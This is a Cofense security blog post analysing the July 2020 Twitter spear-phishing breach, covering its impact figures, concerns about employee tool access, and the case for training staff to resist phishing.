By Aaron Higbee

On July 15, 2020 a small number of Twitter employees were duped in a successful spear phishing attack which Twitter is now calling a “phone spear phish”. There is a mention of a phone, but Twitter didn’t elaborate on what role a phone played. (SIM swap? Misleading link via SMS to a credential phishing page?) Regardless, phishing resulted in stolen Twitter employee credentials. Attackers used the stolen credentials to access internal systems and gain information about Twitter processes, then targeted additional employees to breach account support tools. Scam tweets were sent from dozens of major accounts and the hackers quickly received hundreds of bitcoin transfers worth over $115,000. This type of attack is not unusual as 74% of real phish are credential phish.

Human Vulnerabilities

Twitter has now provided limited detail about the specific technique used in the spear phishing attack and has not disclosed how many employees or contractors have access to its account support tools. Broad levels of access can pose challenges to defending against phishing. Twitter shared, “This attack relied on a significant and concerted attempt to mislead certain employees and exploit human vulnerabilities to gain access to our internal systems,” and called the incident “a striking reminder of how important each person on our team is in protecting our service”. The attack resulted in:

  • 130 accounts targeted
  • 45 accounts had Tweets sent by attackers
  • 36 accounts had the DM inbox accessed
  • 8 accounts had an archive of “Your Twitter Data” downloaded, none of these are Verified
  • Crypto transfers exceeding $115,000.
  • Untold brand damage to Twitter

Human Informants?

In the blog post, Twitter didn’t mention how many Twitter employees were targeted in the phishing campaigns, how many of those employees reported the phishing attempts, and whether or not Twitter security operations were tooled up to act on employee reports of phishing.

In the Cofense annual report on employee phishing resiliency, you might be surprised to see that Technology companies tend to be on the lower end of industry benchmarks.

Too Much Access?

Twitter admits concern around their tools and levels of employee access, yet goes on to claim that access to proprietary tools is “strictly limited and only granted for valid business reasons”. Twitter advises that they have now “significantly limited access to our internal tools and systems” while they complete their investigation, citing “we have teams around the world” that help with account support. Users with account support needs, reported Tweets and applications to Twitter’s developer platform can expect delays. Twitter is focused on restoring access for all account owners who may still be locked out.

Portrait of a Phish

Whether the hackers gained access via phone, a personal device, or office computer, the aim of the attack was to obtain employee credentials. Twitter advises that although their tools, controls, and processes are constantly being updated and improved, they are now “taking a hard look” at how they can make them even more sophisticated.

The specifics of the phish that evaded security controls are vague. Spear phishing tends to be more targeted and dangerous than a typical phishing attack, because the phishing emails are highly believable when tailored to individuals or small, specific groups of people. “Phone phishing” is messy infosec jargon that tends to be a catch-all for all things social engineering that involve a mobile device. A phish via phone could appear to be many things: a message from support requesting credentials for an update, an SMS phish linking the user to a false company login page, or an actual phone call from a friendly colleague requesting login information.

If employees are unaware of the role they play in data breaches, they are more likely to fall for these scams. No amount of security controls can fully secure a network unless employees are also seen as the frontline in phishing defense. Twitter needs to consider building employee resilience to phishing in their plan to become more sophisticated.

All third-party trademarks referenced by Cofense whether in logo form, name form or product form, or otherwise, remain the property of their respective holders, and use of these trademarks in no way indicates any relationship between Cofense and the holders of the trademarks. Any observations contained in this blog regarding circumvention of end point protections are based on observations at a point in time based on a specific set of system configurations. Subsequent updates or different configurations may be effective at stopping these or similar threats.
The Cofense® and PhishMe® names and logos, as well as any other Cofense product or service names or logos displayed on this blog are registered trademarks or trademarks of Cofense Inc.